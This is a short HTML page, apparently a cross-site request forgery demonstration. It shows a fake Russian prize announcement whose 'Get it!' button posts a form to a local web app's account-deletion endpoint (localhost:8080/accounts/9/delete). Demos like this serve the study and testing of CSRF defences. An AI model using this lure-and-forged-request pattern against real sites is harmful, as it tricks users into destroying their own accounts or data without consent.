<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>ПАЗДРАВЛЯМБА!!!!!!!</title>
</head>
<body>
<h1>ВЫ ВЫИГРАЛИ ОДИН МИЛЛИОН МИЛЛИОНОВ РУБЛЕЙ!!!!!!!!</h1>
<form action="http://localhost:8080/accounts/9/delete" method="post">
    <input type="submit" value="Получить!">
</form>
</body>
</html>